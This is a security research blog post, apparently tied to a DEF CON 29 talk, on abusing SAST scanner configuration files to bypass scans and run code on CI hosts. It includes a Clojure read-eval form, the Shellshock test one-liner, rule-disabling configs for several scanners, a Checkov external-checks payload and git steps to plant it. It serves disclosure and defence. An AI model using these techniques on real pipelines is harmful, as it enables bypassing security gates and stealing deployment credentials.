
Malicious code analysis: Abusing SAST (mis)configurations to hack CI systems

What happens when SAST tools do more than just scan code? What if security scanners abuse their privileges?

I recently found a new method that allows secure code analysis mechanisms to be bypassed and, even worse, abused to execute malicious code on their host. This allows anyone with access to a source control repository to run malicious code in sensitive environments — which may be abused to steal credentials, access tokens, and more.
This is a result of ongoing research around exploiting SAST scanners that was first presented at DEF CON 29 this summer.

Part 1 — Prequel

The number one goal of any hacker is and always will be one thing: running their own {malicious} code on the target computer, or in more professional wording, remote code execution (RCE).

Hackers want to hack production systems. That is where the crown jewels are. Where the confidential data is stored. Where mission-critical tasks are running. There are various ways to gain access to production and numerous different motives for doing this, but they all have one uniting goal: running unauthorized code on production environments.

For a long time now, CI systems, and engineering systems in general, have been sought after by hackers due to the ease of getting to production through them. They store sensitive credentials used for deployment, and they have a red carpet paved to production for carrying out the actual deployments.

The attack vector I want to introduce is a new method that allows running malicious code on CI systems, enabling sensitive production credentials to be exfiltrated and malicious artifacts to be deployed.

“Malicious Code Analysis” attack
A method which abuses code analysis software configurations to run code on the host running the code analysis

Part 2 — How it was discovered

Before going deep into the technical areas, I want to share details on what brought me to research the behavior of code analysis software. Developers and builders want to develop as quickly and freely as possible. In a world full of chaos and security issues, we want to be able to develop code in a rapid and frictionless manner, while using various automations such as security guardrails to protect us from making mistakes along the way.

This is where static application security testing (SAST) solutions come in.

They get code as input, and no matter how malicious or harmful the code is, it will never be executed or cause any harm. The software statically analyses the code and identifies potential flaws. And for this reason, both defenders and developers can safely run this static analysis software against any piece of code without being concerned about the code being executed.

But as a veteran hacker, I know these types of statements are rarely true. There is always an exception.

So, one day I built a simple code scanning solution. Running this solution on random code gave me my desired results — 99% of the time — but every once in a while, the service crashed. Interesting. This means the service was somehow impacted by the actual input (code) it analyzed. So I decided to go down the rabbit hole and debug my scanner and voila — I found out that a certain character combination brought the whole service to its knees.

This character combination was a self-evaluating form in Clojure, meaning that when the scanner read the code it actually tried to execute it.

Self-evaluating code in Clojure
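
As a minimal illustration (a sketch; the exact payload lives in the kibit issue linked below), Clojure's #= reader macro evaluates a form at read time whenever *read-eval* is enabled, which is the default for read-string:

;; Illustrative self-evaluating form, not the exact payload from the issue.
;; When a reader with *read-eval* enabled parses this file, the form below
;; executes immediately; no explicit evaluation step is needed.
#=(println "executed while merely being read")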

One hour later, I had a shiny new code execution vector that runs whenever my code gets scanned.

https://github.com/jonase/kibit/issues/235

So I had a working POC of a scanner that went far beyond the scope of statically analyzing the code it received as input. This started a chain of investigations into what else I could break.

Part 3 — Features evolving into security bugs

Remember Shellshock?

Shellshock was born in 1989, but was only found in 2014. The big mystery here is: how does a 25-year-old bug hide so well?

The answer is quite simple: when the bug was created, it wasn’t a security issue. The feature of defining a function in an environment variable and having bash execute it was harmless, because in order to create an environment variable you had to have local access to the machine in the first place.

Then came the internet. Developers needed a way to interact with processes running on remote computers, and the easiest way to pass data to processes started by bash was through environment variables (CGI, for example, passes HTTP request data to scripts exactly this way). Since it was only data, this was considered pretty safe.

Except that in bash, as we saw earlier, an environment variable can define a function, and vulnerable versions of bash would execute commands smuggled in after the function definition, just like our self-evaluating forms in Clojure from the previous part.
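
The canonical Shellshock test makes this concrete (a well-known one-liner, shown here for illustration). The environment variable holds what looks like plain data, yet a vulnerable bash executes the command appended after the function definition while importing it:

# On a vulnerable bash this prints "vulnerable" before "this is a test";
# a patched bash prints only "this is a test".
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"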

Part 4 — Connecting the dots

Code scanning has followed a similar path. From the dawn of software development, we have had different methods and techniques for scanning code, and the majority of them involved running the scanner locally, on the machine of the developer writing the code. So there never really was any need to secure the tools themselves.

But we have since connected these tools to the internet, and we now run them daily in our automations.

The same tools now run as part of our deployment systems, systems to which we grant lots of power and permissions to deploy our most sensitive code. This is a big responsibility to put on tools that were built a decade ago with no intention of running on the internet…

Game on…

Part 5 — The Malicious Code Analysis attack

Code pushed into production has to be verified. We have to make sure it doesn’t contain any security flaws or misconfigurations. The more code we have in our organization, the more we need to rely on automatic scanning and safety procedures to make sure everything is running as it should.

The benefits of scanning are great; we can put guardrails in place pretty easily — from linting our code to standardize the way we write it, to adding security measures that react in real time to new bugs introduced into the code, before they actually get deployed to our production systems.

However, as with all good things, there are downsides. Before detailing the risks, let’s align on what code scanning actually is.

What is a code scanner? (i.e. static analysis program)

Static program analysis is the analysis of computer software that is performed without actually executing programs. https://en.wikipedia.org/wiki/Static_program_analysis

I’ll skip the detailed explanation of how scanners work and save it for a future blog. If you want the details, you can watch my talk from DEF CON 29.

As head of Marketplace integrations, I spend a big part of my job getting intimately familiar with SAST scanners — what they do and how they behave. So I found myself thinking: if I could get one scanner to execute code, there was a high probability that I could get other scanners to misbehave.

My research question became very specific:

Assuming most scanners do intend to perform static analysis, how can I exploit their own behavior to bypass them and even exploit them?

Abusing SAST configuration

Most scanners generate a lot of noise (i.e. findings), one of the main reasons being that they ship with many preconfigured rules that most certainly don’t apply to all code repositories universally. So by design, each scanner has its own configuration mechanism for disabling different subsets of these rules according to the user’s requirements.

Bypassing the scanners

The first mission I defined was to bypass the scanner. Security teams put a lot of effort into automating processes that scan R&D code to make sure flaws don’t reach production. I wanted to create code that would bypass all those protections, but I didn’t want to work hard, or to risk getting caught by some custom ruleset of the security team. I wanted to bypass it all.

Here is a walkthrough of the process and research of one of my targets — Checkov:

Checkov is an open-source tool designed to audit “infrastructure as code” files. The tool is super effective at finding flaws and clearly surfaces the problems in our code.

In our example, I wanted to create a privileged pod using Terraform. Normally, Checkov will scan the code and fail my deployment (if executed inline inside the CI), or at least alert me.

Reading the documentation shows us that when the scanner is executed, it looks for a configuration file inside its target directory.

Adding a .checkov.yml file allows us to configure how we want the scanner to behave, including which rules to exclude from the scan. In this case, we want a configuration that will never fail any code and will run only my own custom check:

soft-fail: true
check:
  - THIS_NOT_THE_CHECK_YOUR_ARE_LOOKING_FOR
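
To see it take effect, it is enough to run the scanner against that directory; per the documentation quoted above, the file is picked up automatically (invocation shown as an illustration):

# Checkov discovers .checkov.yml in the scanned directory on its own.
checkov -d .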

Once I add this configuration file, I “pass” the Checkov inspection even though my code has security flaws:

Before adding a config file:

After adding our “custom” config file:

Essentially, this means that anyone who wants to bypass the SAST security inspection, for any reason (for example, to release to production faster without any ‘obstacles’ put in place by the security team), can follow these three simple steps:

  1. Create a config file disabling all rules
  2. Put it into the code directory that is to be scanned
  3. Never again deal with failing pipelines

This is not proper advice. Do not try this in your CI/CD pipelines.

Important notice:
We are not blaming or putting responsibility on OSS creators. We should not expect OSS to provide the same level of security as commercial alternatives. These tools were not built to protect the systems they run in. That is the user’s responsibility.

We should assume OSS projects could potentially contain security flaws and make sure they are properly configured and running in a safe environment.

With that being said, we did reach out to Palo Alto, as they support Checkov commercially. The response was fast and professional: they added a disclaimer regarding this behavior to their README, and they added support for explicitly setting the config file path, which was previously not possible.

https://github.com/bridgecrewio/checkov/blob/master/README.md

Why did this happen?

Most SAST engines rely on configuration, usually to define which rules to run, to set operational flags, or even just to enable debug mode.

Most scanners use the same convention of searching for a configuration file in the working directory or the target (scanned) directory. Because the most common use case is running the scanner from the working directory, it is common practice to add a scanning configuration there to define our custom policy.

Because of this behavior, anyone with access to a repo that is about to be scanned can “abuse” the scanner logic and tell it to skip all rules, switch to debug mode, or worse (see the next chapter).

Is it common?
Below, we can see a list of scanners that accept configuration files in the current working directory. For each one here, adding the “evil” configuration will disable all security testing.

phpstan.neon:

paths:
  - /var/empty

kics.config:

queries-path: /var/empty

.rubocop.yml:

<%= exit! %>

You can find the open-source repo we released, with more of the configuration files we researched, here: https://github.com/cider-rnd/cicd-lamb

Detailed explanations can be found in my DEF CON video on YouTube.

Attacking the Scanners Right Back

So anyone who has gotten this far is probably asking themselves the same question: if the scanner really picks up my configuration, can I do something more interesting than just disabling scanner features?

Because many scanners are basically frameworks for scanning code, they allow us, whether developers, security engineers, or DevOps, to add our own custom rules.

These rules are sometimes written as code, or loaded through other dynamic configuration mechanisms. This leaves us with the possibility of executing code if and when we are able to override the configuration file.

Going back to the documentation, we can learn that Checkov allows us to load external checks, which is a great feature on its own. But when allowing configuration files to be loaded from the target directory, things can get pretty interesting.

So if we create a folder of Python scripts in our target directory (in our example, we named the folder “scripts”) and add a configuration file that tells the scanner to pick up our custom Python code from that folder, our custom code will execute when the scan runs:

external-checks-dir:
  - scripts
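
Any Python file in that folder is imported when the scan starts, so plain module-level code runs immediately; no valid check class is required. A minimal, harmless sketch of such a payload (the file name scripts/evil_check.py is my own; a real attacker would exfiltrate credentials instead of printing):

# scripts/evil_check.py, a hypothetical payload picked up via external-checks-dir.
# Checkov imports every Python file in this directory, so this module-level
# code executes as a side effect of the import, before any check is evaluated.
import getpass
import platform

print(f"[PoC] code execution on the scanner host: {getpass.getuser()}@{platform.node()}")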

So essentially this means that if I am a developer, or any human or application with write permission on a source code repo, and I want to run malicious code on the CI, I can achieve my goal by doing the following (a short shell sketch follows the steps):

  1. Create my own ‘malicious’ branch of the repo (knowing that when I issue a PR or commit code to this branch, it will trigger a scan in the CI).
  2. Add the following payloads to the branch:
  • A custom malicious configuration file
  • The malicious files/folders loaded by that configuration file
  3. Push / issue a PR (or whatever action will end up triggering the build and running the scan).
  4. Drink your favorite drink and wait for the shell to pop.
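
Put together, the whole attack fits in a handful of commands (a sketch; the branch name, payload paths, and remote are all placeholders):

# Hypothetical end-to-end flow: plant the payloads and let the CI scan run them.
git checkout -b innocent-looking-feature
cp ~/payloads/.checkov.yml .              # the malicious configuration file
cp -r ~/payloads/scripts ./scripts        # the code it tells the scanner to load
git add -A
git commit -m "chore: update configs"
git push origin innocent-looking-feature  # triggers the CI build and the scan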

Conclusions

Continuing our research, we compiled a list of scanners in which we could reproduce our Malicious Code Analysis attack. I am sure this is just the beginning; there are many other tools that weren’t checked. But now, every time I install a new tool, I can’t stop myself from thinking: is it vulnerable?

For more detailed examples, check out our CICD Lamb repo:
https://github.com/cider-rnd/cicd-lamb

Security scanning is supposed to find security issues and flaws in code uploaded to our systems. The possibility that the code itself will target the scanner is usually not considered when designing scanners.

Today, in 2021, we are enabling so much automation — developers, DevOps, SecOps, and AppSec engineers are each trying to automate away as much of our work as possible in order to meet the continuously growing volume of demands from different organizational stakeholders. It is crucial to understand that this automation can be vulnerable to attacks as well, and it is already being attacked.

These automations affect every area of our software development lifecycle (SDLC) and are a crucial part of our CI/CD environments — areas that have access to our most sensitive integrations and systems. These areas are the jackpot of all attacks: the place where, one day, a shell silently pops without any understandable reason.

We need to prepare for that day.

Aftermath (Fixing our problems)

The first stage of fixing is understanding there is a problem. If you have gotten this far, I hope you are starting to understand that this is only the tip of the iceberg.

A few tips that will help you on the quest to prevent these problems:

  • Always scan your code in an ISOLATED environment: block all internet access; isolate resources such as disk, CPU, and network; and destroy the environment after use.
  • Create a fixed configuration file, and set the scanner to use it instead of the default (see the sketch below).
  • Sanitize your CI/CD environment and align it with the principle of least privilege. Your scanners should run in an environment with the minimal possible privileges.
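
As a sketch of how the first two tips can be combined (the image, paths, and pinned policy file are assumptions to adapt to your own pipeline), the scan can run in a throwaway container with no network access, a read-only mount of the code, and a configuration file the repository cannot override:

# Run the scanner isolated: no network, read-only source, pinned config.
docker run --rm --network none \
  -v "$PWD:/src:ro" \
  -v "/etc/ci/checkov-policy.yml:/policy.yml:ro" \
  bridgecrew/checkov --config-file /policy.yml -d /src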

Acknowledgments

I want to thank everyone who supported and helped me with this research.

Cider Security — which gave me the time and resources to research this finding
Daniel Krivelevich — who pushed me to do more thorough research
Sharone Revah Zitzman — thank you for the enormous impact on the presentation and the blog post
Palo Alto Networks, Barak Schoster — for the quick response and great feedback

Special thanks to all the open-source SAST developers and contributors out there. Each one of you is helping the world become a safer place.
